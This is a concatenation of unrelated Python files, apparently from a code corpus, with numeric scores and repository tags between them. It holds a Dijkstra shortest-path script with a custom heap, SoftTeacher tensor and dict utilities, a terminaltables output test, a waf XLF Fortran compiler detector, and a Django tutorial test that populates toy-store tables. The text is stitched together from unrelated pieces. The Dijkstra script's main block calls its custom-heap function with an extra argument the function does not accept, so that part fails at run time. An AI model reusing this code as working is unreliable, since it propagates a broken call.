import heapq import time from os import path from math import floor class Heap: def __init__(self): self.size = 0 self.array = [] self.v2index_map = {} def __get_parent_index(self, idx): return int(floor((idx - 1) / 2)) def __get_left_child_index(self, idx): return 2 * idx + 1 def __get_right_child_index(self, idx): return 2 * idx + 2 def __swap_value(self, i, j): t = self.array[i] self.v2index_map[t[0]] = j self.v2index_map[self.array[j][0]] = i self.array[i] = self.array[j] self.array[j] = t def __bubble_up(self, idx): parent_idx = self.__get_parent_index(idx) while parent_idx >= 0: if self.array[parent_idx][1] <= self.array[idx][1]: break self.__swap_value(parent_idx, idx) idx = parent_idx parent_idx = self.__get_parent_index(idx) def __bubble_down(self, idx): left_idx = self.__get_left_child_index(idx) right_idx = self.__get_right_child_index(idx) while left_idx < self.size or right_idx < self.size: min_idx = left_idx if left_idx >= self.size or (right_idx < self.size and self.array[right_idx][1] < self.array[left_idx][1]): min_idx = right_idx if self.array[idx][1] < self.array[min_idx][1]: break self.__swap_value(idx, min_idx) idx = min_idx left_idx = self.__get_left_child_index(idx) right_idx = self.__get_right_child_index(idx) def get_vertex_key(self, v_id): return self.array[self.v2index_map[v_id]][1] def pop(self): if self.size < 1: raise IndexError min_node = self.array[0] self.size = self.size - 1 self.__swap_value(0, self.size) self.array.pop() if self.size > 1: self.__bubble_down(0) del self.v2index_map[min_node[0]] return min_node def insert(self, node): self.array.append(node) self.v2index_map[node[0]] = self.size self.size = self.size + 1 if self.size > 1: self.__bubble_up(self.size - 1) def modify_key(self, v_id, update_val): idx = self.v2index_map[v_id] self.array[idx] = (v_id, update_val) parent_idx = self.__get_parent_index(idx) if parent_idx >= 0 and self.array[idx][1] < self.array[parent_idx][1]: self.__bubble_up(idx) else: self.__bubble_down(idx) def read_graph(filename): graph = dict() with open(path.join('.', filename), 'r') as f: for row in f.readlines(): edges = row.strip('\t\n').split('\t') s = int(edges[0]) graph[s] = [] for i in range(1, len(edges)): edge = edges[i].split(',') graph[s].append((int(edge[0]), int(edge[1]))) return graph def get_shortest_paths_heapq(graph): heap = [] heapq.heappush(heap, (0, 1)) # (dj_score, vertex_id) distances = {i: 1000000 for i in graph} distances[1] = 0 X = [] while heap: cur_distance, cur_v = heapq.heappop(heap) if cur_distance > distances[cur_v]: continue # added to X X.append(cur_v) for neighbor, weight in graph[cur_v]: dj_score = cur_distance + weight if dj_score < distances[neighbor]: distances[neighbor] = dj_score heapq.heappush(heap, (dj_score, neighbor)) return distances, X def get_shortest_paths_self_defined_heap(graph): heap = Heap() heap.insert((1, 0)) # (vertex_id, dj_score) for v in graph: if v != 1: heap.insert((v, 1000000)) shortest_paths = dict() n_v = len(graph) while len(shortest_paths) < n_v: assert len(shortest_paths) + heap.size == n_v cur_v, v_score = heap.pop() shortest_paths[cur_v] = v_score for neighbor, weight in graph[cur_v]: dj_score = v_score + weight # import pdb;pdb.set_trace() if neighbor not in shortest_paths and dj_score < heap.get_vertex_key(neighbor): heap.modify_key(neighbor, dj_score) return shortest_paths if __name__ == "__main__": # test case 1, output: {1: 0, 2: 1, 3: 2, 4: 2, 5: 3, 6: 4} # graph = { # 1: [(6, 7), (5, 3), (2, 1), (4, 2), (3, 3)], # 2: [(1, 1), (3, 1), (4, 1), (6, 6)], # 3: [(1, 3), (2, 1), (6, 2)], # 4: [(2, 1), (1, 2), (6, 5)], # 5: [(1, 3), (6, 3)], # 6: [(1, 7), (3, 2), (2, 6), (4, 5), (5, 3)] # } graph = read_graph("Dijkstra.txt") dedup_edges = set() for k, _ in graph.items(): for v in _: dedup_edges.add((k, v[0], v[1])) dedup_edges.add((v[0], k, v[1])) assert len(dedup_edges) == sum([len(e) for e in graph.values()]) # graph = {} # heap = Heap() # heap.insert((1,0)) # heap.insert((2,0)) # heap.pop() start_t = time.time() min_distances,X = get_shortest_paths_heapq(graph) print(time.time() - start_t) # print(min_distances) e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197] print(",".join([str(int(min_distances[i])) for i in e])) start_t = time.time() min_distances = get_shortest_paths_self_defined_heap(graph, X) print(time.time() - start_t) # print(min_distances) e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197] print(",".join([str(int(min_distances[i])) for i in e]))
3.328125
3
ssod/utils/structure_utils.py
huimlight/SoftTeacher
604
5596
<reponame>huimlight/SoftTeacher<gh_stars>100-1000 import warnings from collections import Counter, Mapping, Sequence from numbers import Number from typing import Dict, List import numpy as np import torch from mmdet.core.mask.structures import BitmapMasks from torch.nn import functional as F _step_counter = Counter() def list_concat(data_list: List[list]): if isinstance(data_list[0], torch.Tensor): return torch.cat(data_list) else: endpoint = [d for d in data_list[0]] for i in range(1, len(data_list)): endpoint.extend(data_list[i]) return endpoint def sequence_concat(a, b): if isinstance(a, Sequence) and isinstance(b, Sequence): return a + b else: return None def dict_concat(dicts: List[Dict[str, list]]): return {k: list_concat([d[k] for d in dicts]) for k in dicts[0].keys()} def dict_fuse(obj_list, reference_obj): if isinstance(reference_obj, torch.Tensor): return torch.stack(obj_list) return obj_list def dict_select(dict1: Dict[str, list], key: str, value: str): flag = [v == value for v in dict1[key]] return { k: dict_fuse([vv for vv, ff in zip(v, flag) if ff], v) for k, v in dict1.items() } def dict_split(dict1, key): group_names = list(set(dict1[key])) dict_groups = {k: dict_select(dict1, key, k) for k in group_names} return dict_groups def dict_sum(a, b): if isinstance(a, dict): assert isinstance(b, dict) return {k: dict_sum(v, b[k]) for k, v in a.items()} elif isinstance(a, list): assert len(a) == len(b) return [dict_sum(aa, bb) for aa, bb in zip(a, b)] else: return a + b def zero_like(tensor_pack, prefix=""): if isinstance(tensor_pack, Sequence): return [zero_like(t) for t in tensor_pack] elif isinstance(tensor_pack, Mapping): return {prefix + k: zero_like(v) for k, v in tensor_pack.items()} elif isinstance(tensor_pack, torch.Tensor): return tensor_pack.new_zeros(tensor_pack.shape) elif isinstance(tensor_pack, np.ndarray): return np.zeros_like(tensor_pack) else: warnings.warn("Unexpected data type {}".format(type(tensor_pack))) return 0 def pad_stack(tensors, shape, pad_value=255): tensors = torch.stack( [ F.pad( tensor, pad=[0, shape[1] - tensor.shape[1], 0, shape[0] - tensor.shape[0]], value=pad_value, ) for tensor in tensors ] ) return tensors def result2bbox(result): num_class = len(result) bbox = np.concatenate(result) if bbox.shape[0] == 0: label = np.zeros(0, dtype=np.uint8) else: label = np.concatenate( [[i] * len(result[i]) for i in range(num_class) if len(result[i]) > 0] ).reshape((-1,)) return bbox, label def result2mask(result): num_class = len(result) mask = [np.stack(result[i]) for i in range(num_class) if len(result[i]) > 0] if len(mask) > 0: mask = np.concatenate(mask) else: mask = np.zeros((0, 1, 1)) return BitmapMasks(mask, mask.shape[1], mask.shape[2]), None def sequence_mul(obj, multiplier): if isinstance(obj, Sequence): return [o * multiplier for o in obj] else: return obj * multiplier def is_match(word, word_list): for keyword in word_list: if keyword in word: return True return False def weighted_loss(loss: dict, weight, ignore_keys=[], warmup=0): _step_counter["weight"] += 1 lambda_weight = ( lambda x: x * (_step_counter["weight"] - 1) / warmup if _step_counter["weight"] <= warmup else x ) if isinstance(weight, Mapping): for k, v in weight.items(): for name, loss_item in loss.items(): if (k in name) and ("loss" in name): loss[name] = sequence_mul(loss[name], lambda_weight(v)) elif isinstance(weight, Number): for name, loss_item in loss.items(): if "loss" in name: if not is_match(name, ignore_keys): loss[name] = sequence_mul(loss[name], lambda_weight(weight)) else: loss[name] = sequence_mul(loss[name], 0.0) else: raise NotImplementedError() return loss
2.171875
2
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
0
5597
# -*- coding: utf-8 -*- """Test the terminaltables output adapter.""" from __future__ import unicode_literals from textwrap import dedent import pytest from cli_helpers.compat import HAS_PYGMENTS from cli_helpers.tabular_output import terminaltables_adapter if HAS_PYGMENTS: from pygments.style import Style from pygments.token import Token def test_terminal_tables_adapter(): """Test the terminaltables output adapter.""" data = [['abc', 1], ['d', 456]] headers = ['letters', 'number'] output = terminaltables_adapter.adapter( iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ +---------+--------+ | letters | number | +---------+--------+ | abc | 1 | | d | 456 | +---------+--------+''') @pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library') def test_style_output_table(): """Test that *style_output_table()* styles the output table.""" class CliStyle(Style): default_style = "" styles = { Token.Output.TableSeparator: '#ansired', } headers = ['h1', 'h2'] data = [['观音', '2'], ['Ποσειδῶν', 'b']] style_output_table = terminaltables_adapter.style_output_table('ascii') style_output_table(data, headers, style=CliStyle) output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ \x1b[31;01m+\x1b[39;00m''' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' + ''' h2 \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' + ''' 2 \x1b[31;01m|\x1b[39;00m \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' + ''' b \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '\x1b[31;01m+\x1b[39;00m')
2.5625
3
dev/Tools/build/waf-1.7.13/waflib/extras/fc_xlf.py
jeikabu/lumberyard
1,738
5598
<gh_stars>1000+ #! /usr/bin/env python # encoding: utf-8 # harald at klimachs.de import re from waflib import Utils,Errors from waflib.Tools import fc,fc_config,fc_scan from waflib.Configure import conf from waflib.Tools.compiler_fc import fc_compiler fc_compiler['aix'].insert(0, 'fc_xlf') @conf def find_xlf(conf): """Find the xlf program (will look in the environment variable 'FC')""" fc = conf.find_program(['xlf2003_r', 'xlf2003', 'xlf95_r', 'xlf95', 'xlf90_r', 'xlf90', 'xlf_r', 'xlf'], var='FC') fc = conf.cmd_to_list(fc) conf.get_xlf_version(fc) conf.env.FC_NAME='XLF' @conf def xlf_flags(conf): v = conf.env v['FCDEFINES_ST'] = '-WF,-D%s' v['FCFLAGS_fcshlib'] = ['-qpic=small'] v['FCFLAGS_DEBUG'] = ['-qhalt=w'] v['LINKFLAGS_fcshlib'] = ['-Wl,-shared'] @conf def xlf_modifier_platform(conf): dest_os = conf.env['DEST_OS'] or Utils.unversioned_sys_platform() xlf_modifier_func = getattr(conf, 'xlf_modifier_' + dest_os, None) if xlf_modifier_func: xlf_modifier_func() @conf def get_xlf_version(conf, fc): """Get the compiler version""" cmd = fc + ['-qversion'] try: out, err = conf.cmd_and_log(cmd, output=0) except Errors.WafError: conf.fatal('Could not find xlf %r' % cmd) for v in (r"IBM XL Fortran.* V(?P<major>\d*)\.(?P<minor>\d*)",): version_re = re.compile(v, re.I).search match = version_re(out or err) if match: k = match.groupdict() conf.env['FC_VERSION'] = (k['major'], k['minor']) break else: conf.fatal('Could not determine the XLF version.') def configure(conf): conf.find_xlf() conf.find_ar() conf.fc_flags() conf.fc_add_flags() conf.xlf_flags() conf.xlf_modifier_platform()
1.96875
2
tutorials/create_table/tests.py
MeGustas-5427/SQL_Tutorials
13
5599
#!/usr/bin/python3 # -*- coding:utf-8 -*- # __author__ = '__MeGustas__' from django.test import TestCase from django.db import connection from tutorials.create_table.models import * # Create your tests here. class TestHealthFile(TestCase): def setUp(self): cursor = connection.cursor() # Populate Customers table cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \ VALUES('1000000001', 'Village Toys', '200 Maple Lane', 'Detroit', 'MI', '44444', 'USA', '<NAME>', '<EMAIL>');") cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \ VALUES('1000000002', 'Kids Place', '333 South Lake Drive', 'Columbus', 'OH', '43333', 'USA', 'Michelle Green');") cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \ VALUES('1000000003', 'Fun4All', '1 Sunny Place', 'Muncie', 'IN', '42222', 'USA', '<NAME>', '<EMAIL>');") cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \ VALUES('1000000004', 'Fun4All', '829 Riverside Drive', 'Phoenix', 'AZ', '88888', 'USA', '<NAME>', '<EMAIL>');") cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \ VALUES('1000000005', 'The Toy Store', '4545 53rd Street', 'Chicago', 'IL', '54545', 'USA', '<NAME>');") # Populate Vendors table cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('BRS01','Bears R Us','123 Main Street','Bear Town','MI','44444', 'USA');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('BRE02','Bear Emporium','500 Park Street','Anytown','OH','44333', 'USA');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('DLL01','Doll House Inc.','555 High Street','Dollsville','CA','99999', 'USA');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('FRB01','Furball Inc.','1000 5th Avenue','New York','NY','11111', 'USA');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('FNG01','Fun and Games','42 Galaxy Road','London', NULL,'N16 6PS', 'England');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('JTS01','Jouets et ours','1 Rue Amusement','Paris', NULL,'45678', 'France');") # Populate Products table cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BR01', 'BRS01', '8 inch teddy bear', 5.99, '8 inch teddy bear, comes with cap and jacket');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BR02', 'BRS01', '12 inch teddy bear', 8.99, '12 inch teddy bear, comes with cap and jacket');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BR03', 'BRS01', '18 inch teddy bear', 11.99, '18 inch teddy bear, comes with cap and jacket');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BNBG01', 'DLL01', 'Fish bean bag toy', 3.49, 'Fish bean bag toy, complete with bean bag worms with which to feed it');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BNBG02', 'DLL01', 'Bird bean bag toy', 3.49, 'Bird bean bag toy, eggs are not included');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BNBG03', 'DLL01', 'Rabbit bean bag toy', 3.49, 'Rabbit bean bag toy, comes with bean bag carrots');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('RGAN01', 'DLL01', 'Raggedy Ann', 4.99, '18 inch Raggedy Ann doll');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('RYL01', 'FNG01', 'King doll', 9.49, '12 inch king doll with royal garments and crown');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('RYL02', 'FNG01', 'Queen doll', 9.49, '12 inch queen doll with royal garments and crown');") # Populate Orders table cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20005, '2020-05-01', '1000000001');") cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20006, '2020-01-12', '1000000003');") cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20007, '2020-01-30', '1000000004');") cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20008, '2020-02-03', '1000000005');") cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20009, '2020-02-08', '1000000001');") # Populate OrderItems table cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20005, 1, 'BR01', 100, 5.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20005, 2, 'BR03', 100, 10.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20006, 1, 'BR01', 20, 5.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20006, 2, 'BR02', 10, 8.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20006, 3, 'BR03', 10, 11.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 1, 'BR03', 50, 11.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 2, 'BNBG01', 100, 2.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 3, 'BNBG02', 100, 2.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 4, 'BNBG03', 100, 2.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 5, 'RGAN01', 50, 4.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 1, 'RGAN01', 5, 4.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 2, 'BR03', 5, 11.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 3, 'BNBG01', 10, 3.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 4, 'BNBG02', 10, 3.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 5, 'BNBG03', 10, 3.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20009, 1, 'BNBG01', 250, 2.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20009, 2, 'BNBG02', 250, 2.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20009, 3, 'BNBG03', 250, 2.49);") def tearDown(self): # Clean up run after every test method. Customers.objects.all().delete() Vendors.objects.all().delete() Orders.objects.all().delete() OrderItems.objects.all().delete() Products.objects.all().delete() def test_customers(self): for i in Customers.objects.all(): print(i.to_dict()) for i in Vendors.objects.all(): print(i.to_dict()) for i in Orders.objects.all(): print(i.to_dict()) for i in OrderItems.objects.all(): print(i.to_dict()) for i in Products.objects.all(): print(i.to_dict())
2.4375
2